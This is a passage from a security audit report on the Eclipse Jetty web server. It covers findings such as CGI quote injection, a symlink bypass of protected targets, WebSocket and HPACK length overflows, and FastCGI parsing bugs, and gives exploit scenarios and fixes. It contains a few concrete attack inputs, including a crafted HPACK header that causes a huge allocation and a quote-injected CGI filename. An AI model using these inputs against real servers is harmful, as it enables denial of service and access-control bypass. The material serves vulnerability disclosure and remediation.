If a user sends a request to a CGI servlet for a binary with a space in its name, the servlet will escape the command by wrapping it in quotation marks. This wrapped command, plus an optional command prefix, will then be executed through a call to Runtime.exec. If the original binary name provided by the user contains a quotation mark followed by a space, the resulting command line will contain multiple tokens instead of one. For example, if a request references a binary called file" name "here, the escaping algorithm will generate the command line string "file" name "here", which will invoke the binary named file, not the one that the user requested.

if (execCmd.length() > 0 && execCmd.charAt(0) != '"' && execCmd.contains(" "))
    execCmd = "\"" + execCmd + "\"";

Figure 3.1: CGI.java#L337–L338

Exploit Scenario
The cgi-bin directory contains a binary named exec and a subdirectory named exec" commands, which contains a file called bin1. A user sends to the CGI servlet a request for the filename exec" commands/bin1. This request passes the file existence check on lines 194 through 205 in CGI.java. The servlet adds quotation marks around this filename, resulting in the command line string "exec" commands/bin1". When this string is passed to Runtime.exec, instead of executing the bin1 binary, the server executes the exec binary with the argument commands/bin1". This behavior is incorrect and could bypass alias checks; it could also cause other unintended behaviors if a command prefix is configured. Additionally, if the useFullPath configuration setting is off, the command would not need to pass the existence check. Without this setting, an attacker exploiting this issue would not have to rely on a binary and subdirectory with similar names, and the attack could succeed on a much wider variety of directory structures.

Recommendations
Short term, update line 346 in CGI.java to replace the call to exec(String command, String[] env, File dir) with a call to exec(String[] cmdarray, String[] env, File dir) so that the quotation mark escaping algorithm does not create new tokens in the command line string.
Long term, update the quotation mark escaping algorithm so that any unescaped quotation marks in the original name of the command are properly escaped, resulting in one double-quoted token instead of multiple adjacent quoted strings. Additionally, the expression execCmd.charAt(0) != '"' on line 337 of CGI.java is intended to avoid adding additional quotation marks to an already-quoted command string. If this check is unnecessary, it should be removed. If it is necessary, it should be replaced by a more robust check that accurately detects properly formatted double-quoted strings.

+4. Symlink-allowed alias checker ignores protected targets list
Severity: High
Difficulty: Medium
Type: Access Controls
Finding ID: TOB-JETTY-4
Target: org.eclipse.jetty.server.SymlinkAllowedResourceAliasChecker

Description
The class SymlinkAllowedResourceAliasChecker is an alias checker that permits users to access a symlink as long as the symlink is stored within an allowed directory. The following comment appears on line 76 of this class:

// TODO: return !getContextHandler().isProtectedTarget(realURI.toString());

Figure 4.1: SymlinkAllowedResourceAliasChecker.java#L76

As this comment suggests, the alias checker does not yet enforce the context handler's protected resource list. That is, if a symlink is contained in an allowed directory but points to a target on the protected resource list, the alias checker will return a positive match. During our review, we found that some other modules, but not all, independently enforce the protected resource list and will decline to serve resources on the list even if the alias checker returns a positive result. But the modules that do not independently enforce the protected resource list could serve protected resources to attackers conducting symlink attacks.
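To illustrate, the sketch below wires the protected-target check from the TODO comment into the approval path; realURI and the surrounding control flow are assumptions based on the comment in figure 4.1, not Jetty's actual structure.

// Inside SymlinkAllowedResourceAliasChecker (sketch): once the symlink has
// been resolved and found to live inside an allowed directory, also reject
// it when its target is on the context handler's protected resource list.
if (symlinkIsInAllowedDirectory)
{
    // realURI: the resolved target of the symlink, per the TODO comment.
    return !getContextHandler().isProtectedTarget(realURI.toString());
}
return false;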
Exploit Scenario
An attacker induces the creation of a symlink (or a system administrator accidentally creates one) in a web-accessible directory that points to a protected resource (e.g., a child of WEB-INF). By requesting this symlink through a servlet that uses the SymlinkAllowedResourceAliasChecker class, the attacker bypasses the protected resource list and accesses the sensitive files.

Recommendations
Short term, implement the check referenced in the comment so that the alias checker rejects symlinks that point to a protected resource or a child of a protected resource.
Long term, consider clarifying and documenting the responsibilities of different components for enforcing protected resource lists. Consider implementing redundant checks in multiple modules for purposes of layered security.

+5. Missing check for malformed Unicode escape sequences in QuotedStringTokenizer.unquote
Severity: Low
Difficulty: High
Type: Data Validation
Finding ID: TOB-JETTY-5
Target: org.eclipse.jetty.util.QuotedStringTokenizer

Description
The QuotedStringTokenizer class's unquote method parses \u#### Unicode escape sequences, but it does not first check that the escape sequence is properly formatted or that the string is of a sufficient length:

case 'u':
    b.append((char)(
        (TypeUtil.convertHexDigit((byte)s.charAt(i++)) << 24) +
        (TypeUtil.convertHexDigit((byte)s.charAt(i++)) << 16) +
        (TypeUtil.convertHexDigit((byte)s.charAt(i++)) << 8) +
        (TypeUtil.convertHexDigit((byte)s.charAt(i++)))));
    break;

Figure 5.1: QuotedStringTokenizer.java#L547–L555

Any calls to this function with an argument ending in an incomplete Unicode escape sequence, such as "str\u0", will cause the code to throw a java.lang.NumberFormatException exception. The only known execution path that will cause this method to be called with a parameter ending in an invalid Unicode escape sequence is to induce the processing of an ETag Matches header by the ResourceService class, which calls EtagUtils.matches, which calls QuotedStringTokenizer.unquote.

Exploit Scenario
An attacker introduces a maliciously crafted ETag into a browser's cache. Each subsequent request for the affected resource causes a server-side exception, preventing the server from producing a valid response so long as the cached ETag remains in place.

Recommendations
Short term, add a try-catch block around the affected code that drops malformed escape sequences.
Long term, implement a suitable workaround for lenient mode that passes the raw bytes of the malformed escape sequence into the output.
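A bounds-checked variant of the escape handling is sketched below; it validates the four hex digits before consuming them, reusing the s, i, and b locals from figure 5.1 (the exception choice is illustrative, not Jetty's).

case 'u':
{
    // A \u escape requires exactly four hex digits; validate them before
    // consuming so a truncated sequence such as "str\u0" cannot throw a
    // NumberFormatException from deep inside the parse.
    if (i + 4 > s.length())
        throw new IllegalArgumentException("Truncated \\u escape sequence");
    String hex = s.substring(i, i + 4);
    for (int j = 0; j < 4; j++)
    {
        if (Character.digit(hex.charAt(j), 16) < 0)
            throw new IllegalArgumentException("Malformed \\u escape sequence: " + hex);
    }
    b.append((char)Integer.parseInt(hex, 16));
    i += 4;
    break;
}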
+6. WebSocket frame length represented with 32-bit integer
Severity: High
Difficulty: Medium
Type: Data Validation
Finding ID: TOB-JETTY-6
Target: org.eclipse.jetty.websocket.core.internal.Parser

Description
The WebSocket standard (RFC 6455) allows for frames with a size of up to 2^64 bytes. However, the WebSocket parser represents the frame length with a 32-bit integer:

private int payloadLength;
// ...[snip]...
case PAYLOAD_LEN_BYTES:
{
    byte b = buffer.get();
    --cursor;
    payloadLength |= (b & 0xFF) << (8 * cursor);
    // ...[snip]...
}

Figure 6.1: Parser.java, lines 57 and 147–151

As a result, this parsing algorithm will incorrectly parse some length fields as negative integers, causing a java.lang.IllegalArgumentException exception to be thrown when the parser tries to set the limit of a Buffer object to a negative number (refer to TOB-JETTY-7). Consequently, Jetty's WebSocket implementation cannot properly process frames with certain lengths that are compliant with RFC 6455. Even if no exception results, this logic error will cause the parser to incorrectly identify the sizes of WebSocket frames and the boundaries between them. If the server passes these frames to another WebSocket connection, this bug could enable attacks similar to HTTP request smuggling, resulting in bypasses of security controls.

Exploit Scenario
A Jetty WebSocket server is deployed in a reverse proxy configuration in which both Jetty and another web server parse the same stream of WebSocket frames. An attacker sends a frame with a length that the Jetty parser incorrectly truncates to a 32-bit integer. Jetty and the other server interpret the frames differently, which causes errors in the implementation of security controls, such as WAF filters.

Recommendations
Short term, change the payloadLength variable to use the long data type instead of an int.
Long term, audit all arithmetic operations performed on this payloadLength variable to ensure that it is always used as an unsigned integer instead of a signed one. The standard library's Long class can provide this functionality (e.g., Long.compareUnsigned).

+7. WebSocket parser does not check for negative payload lengths
Severity: Low
Difficulty: Low
Type: Data Validation
Finding ID: TOB-JETTY-7
Target: org.eclipse.jetty.websocket.core.internal.Parser

Description
The WebSocket parser's checkFrameSize method checks for payload lengths that exceed the current configuration's maximum, but it does not check for payload lengths that are lower than zero. If the payload length is lower than zero, the code will throw an exception when the payload length is passed to a call to buffer.limit.

Exploit Scenario
An attacker sends a WebSocket payload with a length field that parses to a negative signed integer (refer to TOB-JETTY-6). This payload causes an exception to be thrown and possibly the server process to crash.

Recommendations
Short term, update checkFrameSize to throw an org.eclipse.jetty.websocket.core.exception.ProtocolException exception if the frame's length field is less than zero.
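The two short-term fixes above combine naturally: widen payloadLength to a long and validate it once the length field is fully read. A minimal sketch, assuming a maxFrameSize limit is available to the parser; the ProtocolException type is the one named in the recommendation for TOB-JETTY-7.

private long payloadLength; // long, not int: RFC 6455 allows lengths up to 2^64 - 1

case PAYLOAD_LEN_BYTES:
{
    byte b = buffer.get();
    --cursor;
    payloadLength |= (long)(b & 0xFF) << (8 * cursor);
    if (cursor == 0)
    {
        // A negative value means the peer sent a length >= 2^63; reject it
        // (and anything over our limit) before it ever reaches Buffer.limit().
        if (payloadLength < 0 || payloadLength > maxFrameSize)
            throw new ProtocolException("Invalid WebSocket payload length: " + payloadLength);
    }
    break;
}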
8. WebSocket parser greedily allocates ByteBuffers for large frames
Severity: Medium
Difficulty: Low
Type: Denial of Service
Finding ID: TOB-JETTY-8
Target: org.eclipse.jetty.websocket.core.internal.Parser

Description
When the WebSocket parser receives a partial frame in a ByteBuffer object and auto-fragmenting is disabled, the parser allocates a buffer of a size sufficient to store the entire frame at once:

if (aggregate == null)
{
    if (available < payloadLength)
    {
        // not enough to complete this frame

        // Can we auto-fragment
        if (configuration.isAutoFragment() && isDataFrame)
            return autoFragment(buffer, available);

        // No space in the buffer, so we have to copy the partial payload
        aggregate = bufferPool.acquire(payloadLength, false);
        BufferUtil.append(aggregate.getByteBuffer(), buffer);
        return null;
    }
    //...[snip]...
}

Figure 8.1: Parser.java, lines 323–336

An attacker could send a WebSocket frame with a large payload length field, causing the server to allocate a buffer of a size equal to the specified payload length, without ever sending the entire frame contents. Therefore, an attacker can induce the consumption of gigabytes (or potentially exabytes; refer to TOB-JETTY-6) of memory by sending only hundreds or thousands of bytes over the wire.

Exploit Scenario
An attacker crafts a malicious WebSocket frame with a large payload length field but incomplete payload contents. The server then allocates a buffer of a size equal to the payload length field, causing an excessive consumption of RAM. To ensure that the connection is not promptly dropped, the attacker continues sending parts of this payload a few seconds apart, conducting a slow HTTP attack.

Recommendations
Short term, ensure that the default maximum payload size remains at a low value that is sufficient for most purposes (such as the current default of 64 KB).
Long term, to better support large WebSocket frames, update the use of ByteBuffer objects in the WebSocket parser so that the parser does not allocate the entire buffer as soon as it parses the first fragment. Instead, the buffer should be expanded in relatively small increments (e.g., 10 MB or 100 MB at a time) and then written to only once the data sent by the client exceeds the length of the current buffer. That way, in order to induce the consumption of a large amount of RAM, an attacker would need to send a commensurate number of bytes over the wire.

9. Risk of integer overflow in HPACK's NBitInteger.decode
Severity: Informational
Difficulty: High
Type: Data Validation
Finding ID: TOB-JETTY-9
Target: org.eclipse.jetty.http2.hpack.internal.NBitInteger

Description
The static function NBitInteger.decode is used to decode bytestrings in HPACK's integer format. It should return only positive integers since HPACK's integer format is not intended to support negative numbers. However, the following loop in NBitInteger.decode is susceptible to integer overflows in its multiplication and addition operations:

public static int decode(ByteBuffer buffer, int n)
{
    if (n == 8)
    {
        // ...
    }

    int nbits = 0xFF >>> (8 - n);
    int i = buffer.get(buffer.position() - 1) & nbits;
    if (i == nbits)
    {
        int m = 1;
        int b;
        do
        {
            b = 0xff & buffer.get();
            i = i + (b & 127) * m;
            m = m * 128;
        }
        while ((b & 128) == 128);
    }
    return i;
}

Figure 9.1: NBitInteger.java, lines 105–145

For example, NBitInteger.decode(0xFF8080FFFF0F, 7) returns -16257. Any overflow that occurs in the function would not be a problem on its own since, in general, the output of this function ought to be validated before it is used; however, when coupled with other issues (refer to TOB-JETTY-10), an overflow can cause vulnerabilities.

Recommendations
Short term, modify NBitInteger.decode to check that its result is nonnegative before returning it.
Long term, consider merging the QPACK and HPACK implementations for NBitInteger, since they perform the same functionality; the QPACK implementation of NBitInteger checks for overflows.
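An overflow-checked variant of the continuation loop is sketched below; it accumulates into a long and rejects any value that no longer fits in a nonnegative int. This is illustrative, not Jetty's fix, and the exception type is an assumption.

// Continuation-byte loop from figure 9.1, reworked to detect overflow.
long value = i; // i == nbits at this point, as in figure 9.1
int shift = 0;
int b;
do
{
    b = 0xff & buffer.get();
    if (shift >= 32) // more than 5 continuation bytes cannot fit in an int
        throw new IllegalArgumentException("HPACK integer has too many continuation bytes");
    value += (long)(b & 127) << shift;
    shift += 7;
    if (value > Integer.MAX_VALUE)
        throw new IllegalArgumentException("HPACK integer overflow");
}
while ((b & 128) == 128);
return (int)value;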
10. MetaDataBuilder.checkSize accepts headers of negative lengths
Severity: Medium
Difficulty: High
Type: Denial of Service
Finding ID: TOB-JETTY-10
Target: org.eclipse.jetty.http2.hpack.internal.MetaDataBuilder

Description
The MetaDataBuilder.checkSize function accepts user-entered HPACK header values of negative sizes, which could cause a very large buffer to be allocated later when the user-entered size is multiplied by 2.

MetaDataBuilder.checkSize determines whether a header name or value exceeds the size limit and throws an exception if the limit is exceeded:

public void checkSize(int length, boolean huffman) throws SessionException
{
    // Apply a huffman fudge factor
    if (huffman)
        length = (length * 4) / 3;
    if ((_size + length) > _maxSize)
        throw new HpackException.SessionException("Header too large %d > %d", _size + length, _maxSize);
}

Figure 10.1: MetaDataBuilder.java, lines 291–298

However, it does not throw an exception if the size is negative. Later, the Huffman.decode function multiplies the user-entered length by 2 before allocating a buffer:

public static String decode(ByteBuffer buffer, int length) throws HpackException.CompressionException
{
    Utf8StringBuilder utf8 = new Utf8StringBuilder(length * 2);
    // ...

Figure 10.2: Huffman.java, lines 357–359

This means that if a user provides a negative length value (or, more precisely, a length value that becomes negative when multiplied by the 4/3 fudge factor), and this length value becomes a very large positive number when multiplied by 2, then the user can cause a very large buffer to be allocated on the server.

Exploit Scenario
An attacker repeatedly sends HTTP messages with the HPACK header 0x00ff8080ffff0b. Each time this header is decoded, the following occurs:
● HpackDecode.decode determines that a Huffman-coded value of length -1073758081 needs to be decoded.
● MetaDataBuilder.checkSize approves this length.
● The number is multiplied by 2, resulting in 2147451134, and Huffman.decode allocates a 2.1 GB string array.
● Huffman.decode experiences a buffer overflow error, and the array is deallocated the next time garbage collection happens. (Note that this deallocation can be delayed by adding valid Huffman-coded characters to the end of the header.)
Depending on the timing of garbage collection, the number of threads, and the amount of memory available on the server, this may cause the server to run out of memory.

Recommendations
Short term, have MetaDataBuilder.checkSize check that the given length is positive directly before adding it to _size and comparing it with _maxSize.
Long term, add checks for integer overflows in Huffman.decode and in NBitInteger.decode (refer to TOB-JETTY-9) for added redundancy.
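For concreteness, the following standalone harness (ours, for illustration only) replays the arithmetic of figure 9.1 on the length bytes of the exploit header 0x00ff8080ffff0b; running it prints -1073758081, the negative length cited above.

public class NBitWrapDemo
{
    public static void main(String[] args)
    {
        // Continuation bytes that follow the all-ones 7-bit prefix byte 0xff.
        int[] continuation = {0x80, 0x80, 0xff, 0xff, 0x0b};
        int i = 0xFF >>> (8 - 7); // 7-bit prefix, all ones: 127
        int m = 1;
        for (int b : continuation)
        {
            i = i + (b & 127) * m; // same 32-bit arithmetic as figure 9.1
            m = m * 128;
        }
        System.out.println(i); // prints -1073758081
    }
}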
11. Insufficient space allocated when encoding QPACK instructions and entries
Severity: Low
Difficulty: High
Type: Denial of Service
Finding ID: TOB-JETTY-11
Target:
● org.eclipse.jetty.http3.qpack.internal.instruction.IndexedNameEntryInstruction
● org.eclipse.jetty.http3.qpack.internal.instruction.LiteralNameEntryInstruction
● org.eclipse.jetty.http3.qpack.internal.instruction.EncodableEntry

Description
Multiple expressions do not allocate enough buffer space when encoding QPACK instructions and entries, which could result in a buffer overflow exception.

In IndexedNameEntry, the following expression determines how much space to allocate when encoding the instruction:

int size = NBitIntegerEncoder.octetsNeeded(6, _index) + (_huffman ? HuffmanEncoder.octetsNeeded(_value) : _value.length()) + 2;

Figure 11.1: IndexedNameEntry.java, line 58

Later, the following two lines encode the value size for Huffman-coded and non-Huffman-coded strings, respectively:

NBitIntegerEncoder.encode(byteBuffer, 7, HuffmanEncoder.octetsNeeded(_value));
// ...
NBitIntegerEncoder.encode(byteBuffer, 7, _value.length());

Figure 11.2: IndexedNameEntry.java, lines 71 and 77

These encodings can take up more than 1 byte if the value's length is over 126 because the number will fill up the 7 bits given to it in the first byte. However, the int size expression in figure 11.1 assumes that it will take up only 1 byte. Thus, if the value's length is over 126, too few bytes may be allocated for the instruction, causing a buffer overflow.

The same problem occurs in LiteralNameEntryInstruction:

int size = (_huffmanName ? HuffmanEncoder.octetsNeeded(_name) : _name.length()) +
    (_huffmanValue ? HuffmanEncoder.octetsNeeded(_value) : _value.length()) + 2;

Figure 11.3: LiteralNameEntryInstruction.java, lines 59–60

This expression assumes that the name's length will fit into 5 bits and that the value's length will fit into 7 bits. If the name's length is over 30 bytes or the value's length is over 126 bytes, these assumptions will be false and too little space may be allocated for the instruction, which could cause a buffer overflow.

A similar problem occurs in EncodableEntry.ReferencedNameEntry. The getRequiredSize method in this file calculates how much space should be allocated for its encoding:

public int getRequiredSize(int base)
{
    String value = getValue();
    int relativeIndex = _nameEntry.getIndex() - base;
    int valueLength = _huffman ? HuffmanEncoder.octetsNeeded(value) : value.length();
    return 1 + NBitIntegerEncoder.octetsNeeded(4, relativeIndex) + 1 + NBitIntegerEncoder.octetsNeeded(7, valueLength) + valueLength;
}

Figure 11.4: EncodableEntry.java, lines 181–187

The method returns the wrong size if the value is longer than 126 bytes. Additionally, it assumes that the name will use a post-base reference rather than a normal one, which may be incorrect.

An additional problem is present in this method. It assumes that value's length in bytes will be returned by value.length(). However, value.length() measures the number of characters in value, not the number of bytes, so if value contains multibyte characters (e.g., UTF-8), too few bytes will be allocated. The length of value should be calculated by using value.getBytes() instead of value.length().

The getRequiredSize method in EncodableEntry.LiteralEntry also incorrectly uses value.length():

public int getRequiredSize(int base)
{
    String name = getName();
    String value = getValue();
    int nameLength = _huffman ? HuffmanEncoder.octetsNeeded(name) : name.length();
    int valueLength = _huffman ? HuffmanEncoder.octetsNeeded(value) : value.length();
    return 2 + NBitIntegerEncoder.octetsNeeded(3, nameLength) + nameLength + NBitIntegerEncoder.octetsNeeded(7, valueLength) + valueLength;
}

Figure 11.5: EncodableEntry.java, lines 243–250

Note that name.length() is used to measure the byte length of name, and value.length() is used to measure the byte length of value.

Jetty's HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready.

Recommendations
Short term, change the relevant expressions to account for the extra length.
Long term, build out additional test cases for QPACK and other parsers used in HTTP/3 to test for the correct handling of edge cases and identify memory handling exceptions.
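The char-count versus byte-count mismatch underlying several of the expressions above is easy to demonstrate in isolation; the standalone snippet below (ours, not Jetty code) shows String.length() undercounting the bytes that getBytes() actually produces.

import java.nio.charset.StandardCharsets;

public class LengthMismatchDemo
{
    public static void main(String[] args)
    {
        String value = "caf\u00e9"; // "café": 4 characters, 5 UTF-8 bytes
        System.out.println(value.length());                                // 4
        System.out.println(value.getBytes(StandardCharsets.UTF_8).length); // 5
        // A size computation based on value.length() would allocate one
        // byte too few for this value's UTF-8 encoding.
    }
}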
12. LiteralNameEntryInstruction incorrectly encodes value length
Severity: Medium
Difficulty: Medium
Type: Denial of Service
Finding ID: TOB-JETTY-12
Target: org.eclipse.jetty.http3.qpack.internal.instruction.LiteralNameEntryInstruction

Description
QPACK instructions for inserting entries with literal names and non-Huffman-coded values will be encoded incorrectly when the value's length is over 30, which could cause values to be sent incorrectly or errors to occur during decoding. The following snippet of the LiteralNameEntryInstruction.encode function is responsible for encoding the header value:

78    if (_huffmanValue)
79    {
80        byteBuffer.put((byte)(0x80));
81        NBitIntegerEncoder.encode(byteBuffer, 7, HuffmanEncoder.octetsNeeded(_value));
82        HuffmanEncoder.encode(byteBuffer, _value);
83    }
84    else
85    {
86        byteBuffer.put((byte)(0x00));
87        NBitIntegerEncoder.encode(byteBuffer, 5, _value.length());
88        byteBuffer.put(_value.getBytes());
89    }

Figure 12.1: LiteralNameEntryInstruction.java, lines 78–89

On line 87, 5 is the second parameter to NBitIntegerEncoder.encode, indicating that the number will take up 5 bits in the first encoded byte; however, the second parameter should be 7 instead. This means that when _value.length() is over 30, it will be incorrectly encoded.

Jetty's HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready.

Recommendations
Short term, change the second parameter of the NBitIntegerEncoder.encode function from 5 to 7 in order to reflect that the number will take up 7 bits.
Long term, write more tests to catch similar encoding/decoding problems.

13. FileInitializer does not check for symlinks
Severity: High
Difficulty: High
Type: Data Validation
Finding ID: TOB-JETTY-13
Target: org.eclipse.jetty.start.FileInitializer

Description
Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. During this process, the FileInitializer class validates the destination path and throws an IOException exception if the destination is outside the ${jetty.base} directory. However, this validation routine does not check for symlinks:

// now on copy/download paths (be safe above all else)
if (destination != null && !destination.startsWith(_basehome.getBasePath()))
    throw new IOException("For security reasons, Jetty start is unable to process file resource not in ${jetty.base} - " + location);

Figure 13.1: FileInitializer.java, lines 112–114

None of the subclasses of FileInitializer check for symlinks either. Thus, if the ${jetty.base} directory contains a symlink, a file path in a module's .ini file beginning with the symlink name will pass the validation check, and the file will be written to a subdirectory of the symlink's destination.
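A resolution-based containment check (see the short-term recommendation below) might look like the following sketch. checkDestination is a hypothetical helper, and the parent directory is resolved because the destination file may not exist yet at validation time.

import java.io.IOException;
import java.nio.file.Path;

// Hypothetical helper: reject destinations that escape ${jetty.base} once
// symlinks are resolved.
private static void checkDestination(Path destination, Path baseHome) throws IOException
{
    // toRealPath() resolves symlinks, ".", and ".."; resolve the parent
    // because the destination itself may not have been created yet.
    Path realDestination = destination.toAbsolutePath().getParent().toRealPath()
        .resolve(destination.getFileName());
    if (!realDestination.startsWith(baseHome.toRealPath()))
        throw new IOException("For security reasons, Jetty start is unable to process file resource not in ${jetty.base} - " + destination);
}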
Exploit Scenario
A system's ${jetty.base} directory contains a symlink called dir, which points to /etc. The system administrator enables a Jetty module whose .ini file contains a [files] entry that downloads a remote file and writes it to the relative path dir/config.conf. The filesystem follows the symlink and writes a new configuration file to /etc/config.conf, which impacts the server's system configuration. Additionally, since the FileInitializer class uses the REPLACE_EXISTING flag, this behavior overwrites an existing system configuration file.

Recommendations
Short term, rewrite all path checks in FileInitializer and its subclasses to include a call to the Path.toRealPath function, which, by default, will resolve symlinks and produce the real filesystem path pointed to by the Path object. If this real path is outside ${jetty.base}, the file write operation should fail.
Long term, consolidate all filesystem operations involving the ${jetty.base} or ${jetty.home} directories into a single centralized class that automatically performs symlink resolution and rejects operations that attempt to read from or write to an unauthorized directory. This class should catch and handle the IOException exception that is thrown in the event of a link loop or a large number of nested symlinks.

14. FileInitializer permits downloading files via plaintext HTTP
Severity: High
Difficulty: High
Type: Data Exposure
Finding ID: TOB-JETTY-14
Target: org.eclipse.jetty.start.FileInitializer

Description
Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. If the specified URL is a plaintext HTTP URL, Jetty does not raise an error or warn the user. Transmitting files over plaintext HTTP is intrinsically insecure and exposes sensitive data to tampering and eavesdropping in transit.

Exploit Scenario
A system administrator enables a Jetty module that downloads a remote file over plaintext HTTP during initialization. An attacker with a network intermediary position sniffs the traffic and infers sensitive information about the design and configuration of the Jetty system under configuration. Alternatively, the attacker actively tampers with the file during transmission from the remote server to the Jetty installation, which enables the attacker to alter the module's behavior and launch other attacks against the targeted system.

Recommendations
Short term, add a check to the FileInitializer class and its subclasses to prohibit downloads over plaintext HTTP. Additionally, add a validation check to the module .ini file parser to reject any configuration that includes a plaintext HTTP URL in the [files] section.
Long term, consolidate all remote file downloads conducted during module configuration operations into a single centralized class that automatically rejects plaintext HTTP URLs. If current use cases require support of plaintext HTTP URLs, then at a minimum, have Jetty display a prominent warning message and prompt the user for manual confirmation before performing the unencrypted download.
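The scheme check itself is small; a sketch (with a hypothetical helper name) that could be called before any module file download:

import java.io.IOException;
import java.net.URI;

// Hypothetical helper: refuse to fetch module files over unencrypted HTTP.
private static void requireEncryptedTransport(URI uri) throws IOException
{
    if ("http".equalsIgnoreCase(uri.getScheme()))
        throw new IOException("Refusing to download module file over plaintext HTTP: " + uri);
}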
15. NullPointerException thrown by FastCGI parser on invalid frame type
Severity: Medium
Difficulty: Low
Type: Data Validation
Finding ID: TOB-JETTY-15
Target: org.eclipse.jetty.fcgi.parser.Parser

Description
Because of a missing null check, the Jetty FastCGI client's Parser class throws a NullPointerException exception when parsing a frame with an invalid frame type field. This exception occurs because the findContentParser function returns null when it does not have a ContentParser object matching the specified frame type, and the caller never checks the findContentParser return value for null before dereferencing it.

case CONTENT:
{
    ContentParser contentParser = findContentParser(headerParser.getFrameType());
    if (headerParser.getContentLength() == 0)
    {
        padding = headerParser.getPaddingLength();
        state = State.PADDING;
        if (contentParser.noContent())
            return true;
    }
    else
    {
        ContentParser.Result result = contentParser.parse(buffer);
        // ...[snip]...
    }
    break;
}

Figure 15.1: Parser.java, lines 82–114

Exploit Scenario
An attacker operates a malicious web server that supports FastCGI. A Jetty application communicates with this server by using Jetty's built-in FastCGI client. The remote server transmits a frame with an invalid frame type, causing a NullPointerException exception and a crash in the Jetty application.

Recommendations
Short term, add a null check to the parse function to abort the parsing process before dereferencing a null return value from findContentParser. If a null value is detected, parse should throw an appropriate exception, such as IllegalStateException, that Jetty can catch and handle safely.
Long term, build out a larger suite of test cases that ensures graceful handling of malformed traffic and data.
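The missing check is a two-line addition at the top of the CONTENT case; a sketch using the names from figure 15.1, with the exception type suggested in the recommendation:

case CONTENT:
{
    ContentParser contentParser = findContentParser(headerParser.getFrameType());
    // Unknown frame type: fail loudly instead of dereferencing null below.
    if (contentParser == null)
        throw new IllegalStateException("Invalid FastCGI frame type: " + headerParser.getFrameType());
    // ... rest of the case as in figure 15.1 ...
}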
16. Documentation does not specify that request contents and other user data can be exposed in debug logs
Severity: Medium
Difficulty: High
Type: Data Exposure
Finding ID: TOB-JETTY-16
Target: Jetty 12 Operations Guide; numerous locations throughout the codebase

Description
Over 100 times, the system calls LOG.debug with a parameter of the format BufferUtil.toDetailString(buffer), which outputs up to 56 bytes of the buffer into the log file. Jetty's implementations of various protocols and encodings, including GZIP, WebSocket, multipart encoding, and HTTP/2, output user data received over the network to the debug log using this type of call. An example instance from Jetty's WebSocket implementation appears in figure 16.1.

public Frame.Parsed parse(ByteBuffer buffer) throws WebSocketException
{
    try
    {
        // parse through
        while (buffer.hasRemaining())
        {
            if (LOG.isDebugEnabled())
                LOG.debug("{} Parsing {}", this, BufferUtil.toDetailString(buffer));
            // ...[snip]...
        }
        // ...[snip]...
    }
    // ...[snip]...
}

Figure 16.1: Parser.java, lines 88–96

Although the Jetty 12 Operations Guide does state that Jetty debugging logs can quickly consume massive amounts of disk space, it does not advise system administrators that the logs can contain sensitive user data, such as personally identifiable information. Thus, the possibility of raw traffic being captured from debug logs is undocumented.

Exploit Scenario
A Jetty system administrator turns on debug logging in a production environment. During the normal course of operation, a user sends traffic containing sensitive information, such as personally identifiable information or financial data, and this data is recorded to the debug log. An attacker who gains access to this log can then read the user data, compromising data confidentiality and the user's privacy rights.

Recommendations
Short term, update the Jetty Operations Guide to state that in addition to being extremely large, debug logs can contain sensitive user data and should be treated as sensitive.
Long term, consider moving all debugging messages that contain buffer excerpts into a high-detail debug log that is enabled only for debug builds of the application.

17. HttpStreamOverFCGI internally marks all requests as plaintext HTTP
Severity: High
Difficulty: High
Type: Data Validation
Finding ID: TOB-JETTY-17
Target: org.eclipse.jetty.fcgi.server.internal.HttpStreamOverFCGI

Description
The HttpStreamOverFCGI class translates FastCGI messages into a form that other system components using the HttpStream interface can process. This class's onHeaders callback mistakenly marks each MetaData.Request object as a plaintext HTTP request, as the "TODO" comment shown in figure 17.1 indicates:

public void onHeaders()
{
    String pathQuery = URIUtil.addPathQuery(_path, _query);
    // TODO https?
    MetaData.Request request = new MetaData.Request(_method, HttpScheme.HTTP.asString(),
        hostPort, pathQuery, HttpVersion.fromString(_version), _headers, Long.MIN_VALUE);
    // ...[snip]...
}

Figure 17.1: HttpStreamOverFCGI.java, lines 108–119

In some configurations, other Jetty components could misinterpret a message received over FCGI as a plaintext HTTP message, which could cause a request to be incorrectly rejected, redirected in an infinite loop, or forwarded to another system over a plaintext HTTP channel instead of HTTPS.

Exploit Scenario
A Jetty instance runs an FCGI server and uses the HttpStream interface to process messages. The MetaData.Request class's getURI method is used to check the incoming request's URI. This method mistakenly returns a plaintext HTTP URL due to the bug in HttpStreamOverFCGI.java. One of the following takes place during the processing of this request:
● An application-level security control checks the incoming request's URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application rejects the request and refuses to process it, causing a denial of service.
● An application-level security control checks the incoming request's URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application
Excessively permissive and non-standards-compliant error handling in HTTP/2 implementation Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-18 Target: The org.eclipse.jetty.http2.parser and org.eclipse.jetty.http2.parser packages Description Jetty’s HTTP/2 implementation violates RFC 9113 in that it fails to terminate a connection with an appropriate error code when the remote peer sends a frame with one of the following protocol violations: ● ● ● A SETTINGS frame with the ACK flag set and a nonzero payload length A PUSH_PROMISE frame in a stream with push disabled A GOAWAY frame with its stream ID not set to zero None of these situations creates an exploitable vulnerability. However, noncompliant protocol implementations can create compatibility problems and could cause vulnerabilities when deployed in combination with other misconfigured systems. Exploit Scenario A Jetty instance connects to an HTTP/2 server, or serves a connection from an HTTP/2 client, and the remote peer sends traffic that should cause Jetty to terminate the connection. Instead, Jetty keeps the connection alive, in violation of RFC 9113. If the remote peer is programmed to handle the noncompliant traffic differently than Jetty, further problems could result, as the two implementations interpret protocol messages differently. Recommendations Short term, update the HTTP/2 implementation to check for the following error conditions and terminate the connection with an error code that complies with RFC 9113: ● ● A peer receives a SETTINGS frame with the ACK flag set and a payload length greater than zero. A client receives a PUSH_PROMISE frame after having sent, and received an acknowledgement for, a SETTINGS frame with SETTINGS_ENABLE_PUSH equal to zero. 67 OSTIF Eclipse: Jetty Security Assessment ● A peer receives a GOAWAY frame with the stream identifier field not set to zero. Long term, audit Jetty’s implementation of HTTP/2 and other protocols to ensure that Jetty handles errors in a standards-compliant manner and terminates connections as required by the applicable specifications. 68 OSTIF Eclipse: Jetty Security 